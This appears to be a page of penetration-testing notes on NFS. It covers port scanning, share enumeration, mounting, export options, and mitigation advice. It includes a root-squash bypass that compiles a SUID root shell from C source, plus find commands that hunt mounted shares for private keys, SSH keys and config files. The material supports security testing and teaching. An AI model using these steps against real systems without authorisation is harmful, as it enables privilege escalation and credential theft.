NFS Pentesting Notes

Protocol Overview

Basic Information

  • Port: TCP/UDP 2049 (NFS), TCP/UDP 111 (RPC)

  • Protocol Type: Application layer

  • Purpose: Remote file system mounting and access

  • Security: Relies on Unix-style permissions and RPC authentication

Protocol Versions

Version
Features
Security

NFSv2

UDP-based, basic operations

Basic Unix permissions

NFSv3

TCP/UDP, larger files, async writes

AUTH_SYS, better error handling

NFSv4

TCP only, stateful, single port

Kerberos, ACLs, encryption

NFSv4.1

Parallel NFS (pNFS)

Enhanced security features

Initial Enumeration

Port Scanning

# Basic NFS scan
nmap -p111,2049 -sV <target>

# Aggressive scan with scripts
nmap -p111,2049 -sV -sC -A <target>

# All NFS scripts
nmap -p111,2049 --script nfs* <target>

RPC Information Gathering

# Using rpcinfo
rpcinfo -p <target>

# Using showmount
showmount -e <target>

# Using rpcclient
rpcclient -N -U "" <target>

Share Operations

Listing Shares

# Using showmount
showmount -e <target>

# Using rpcinfo
rpcinfo -p <target> | grep nfs

# Using Nmap
nmap -sV --script=nfs-ls,nfs-statfs,nfs-showmount <target>

Mounting Shares

# Create mount point
mkdir /tmp/mount

# Basic mount
mount -t nfs <target>:/share /tmp/mount

# Mount with specific version
mount -t nfs -o vers=3 <target>:/share /tmp/mount

# Mount with no_root_squash check
mount -t nfs -o vers=3,nolock <target>:/share /tmp/mount

# Force UDP mount
mount -t nfs -o vers=2,udp <target>:/share /tmp/mount

Common NSE Scripts

# Discovery scripts
nmap -p111,2049 --script nfs-ls <target>
nmap -p111,2049 --script nfs-showmount <target>
nmap -p111,2049 --script nfs-statfs <target>

# Run all NFS scripts
nmap -p111,2049 --script nfs* <target>

Quick Reference Commands

# Quick Enumeration
nmap -sV --script=nfs* -p111,2049 <target>
showmount -e <target>
rpcinfo -p <target>

# Quick Mount
mkdir /tmp/mount
mount -t nfs <target>:/share /tmp/mount

# Quick Permission Check
ls -la /tmp/mount
find /tmp/mount -perm -4000 -type f

# Quick Cleanup
umount /tmp/mount
rm -rf /tmp/mount

Access Control Bypass

Root Squashing Bypass

# Check if no_root_squash is enabled
cat /etc/exports

# Create payload as root
echo 'int main() { setuid(0); system("/bin/bash"); return 0; }' > shell.c

# Compile
gcc shell.c -o shell

# Set SUID bit
chmod +s shell

# Execute from mounted share
./shell

Permission Analysis

# List files with permissions
ls -la /tmp/mount

# Find SUID binaries
find /tmp/mount -perm -4000 -type f

# Find world-writable files
find /tmp/mount -perm -2 -type f

Configuration Files

Server Configuration

  • Main config: /etc/exports

  • RPC settings: /etc/default/nfs-kernel-server

  • Systemd unit: /lib/systemd/system/nfs-kernel-server.service

Client Configuration

  • Mount settings: /etc/fstab

  • RPC settings: /etc/default/nfs-common

  • Systemd unit: /lib/systemd/system/nfs-client.target

Export Options

Critical Settings

Option
Risk Level
Description

no_root_squash

High

Allows root access

insecure

High

Allows connections from ports > 1024

rw

Medium

Allows write access

sync

Low

Synchronous write operations

async

Medium

Asynchronous write operations

no_subtree_check

Low

Disables directory verification

Common Vulnerabilities

  1. Configuration Issues

    • no_root_squash enabled

    • Insecure export options

    • World-readable sensitive files

    • Improper access controls

  2. Version-specific

    • NFSv2/v3 lack encryption

    • RPC vulnerabilities

    • Authentication bypasses

  3. Implementation Issues

    • Race conditions

    • Buffer overflows

    • Arbitrary file access

Post-Exploitation

Information Gathering

# List all files recursively
ls -laR /tmp/mount

# Find sensitive files
find /tmp/mount -name "*.key" -o -name "*.pem" -o -name "*.conf"

# Check for hidden files
find /tmp/mount -name ".*"

# Look for user data
find /tmp/mount -name "id_rsa" -o -name ".ssh"

Privilege Escalation

# Check mount options
mount | grep nfs

# Look for SUID binaries
find /tmp/mount -perm -4000 -type f

# Check write permissions
find /tmp/mount -writable -type f

# Create SUID shell (if no_root_squash)
gcc -o shell shell.c
chmod +s shell

Common Status Codes

Code
Meaning

NFSERR_PERM

Not owner

NFSERR_NOENT

No such file/directory

NFSERR_IO

I/O error

NFSERR_ACCES

Permission denied

NFSERR_EXIST

File exists

Best Practices for Pentesting

  1. Initial Reconnaissance

    • Identify NFS version

    • List available shares

    • Check mount permissions

    • Analyze export options

  2. Deep Enumeration

    • Mount all accessible shares

    • Check file permissions

    • Look for sensitive data

    • Identify misconfigurations

  3. Documentation

    • Record available shares

    • Note mount options

    • Document file permissions

    • Save vulnerability evidence

  4. Risk Assessment

    • Evaluate export options

    • Check for sensitive data exposure

    • Assess potential for privilege escalation

    • Consider network exposure

  5. Common Attack Vectors

    • Root squashing bypass

    • File permission abuse

    • SUID binary creation

    • Sensitive file access

  6. Mitigation Recommendations

    • Enable root squashing

    • Use restrictive export options

    • Implement proper access controls

    • Enable encryption (NFSv4)

    • Regular security audits

    • Network segmentation

PreviousDNS Pentesting NotesNextWeb Reconnaissance Notes